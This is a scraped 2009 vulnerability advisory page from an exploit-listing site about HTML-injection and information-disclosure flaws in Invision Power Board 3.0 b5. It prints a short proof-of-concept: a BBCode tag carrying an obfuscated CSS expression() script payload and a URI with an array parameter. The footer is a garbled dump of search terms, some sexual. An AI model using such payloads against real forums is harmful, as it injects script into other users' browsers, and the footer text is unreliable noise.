about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Invision Power Board Multiple HTML-Injection and Information Disclosure Vulnerabilities


Title Invision Power Board Multiple HTML-Injection and Information Disclosure Vulnerabilities
Published 2009-04-27-12:00AM
Updated 2009-04-27-09:06PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  brain[pillow]
Vulnerable  Invision Power Services Invision Power Board 3.0 b5
Not Vulnerable  
Code  Attackers can exploit these issues via a browser. The following example data and URI are available:[email]qwe@[twitter]dodo style=`top:expr/* */ession/*bypassed*/(alert(/yahoo/))`do[/twitter]example.com[/email]http://www.example.com/index.php?app=core&module=ajax&section=register&do=check-display-name&name[]=
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Mon, 09 Nov 2009 10:16:14 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
%2Fsearch% Saxy girl. I+agree+wi sar a www.zg715. allinurl:c fully nake amxmod asian scho www.maxgam Dog.com arabic+fre www.gy618. Jazabiat hentai xx netware indian ido www.808go5 www.31cake hao568.cn Sex.Indian ptrace-kmo +WWW.India www bad jo for sex an Main ne di sling Naked babe nude breat indiasexy. PHP NUKE mambo Remo w.w.w.babe Manuka indiasexy. free+video mambo Remo www.yoyome www.unname first usa panty sex yoyome.cn guyu.net lo75l Anargali Crack D/r/ Girls sexy Selteco prototype sixsay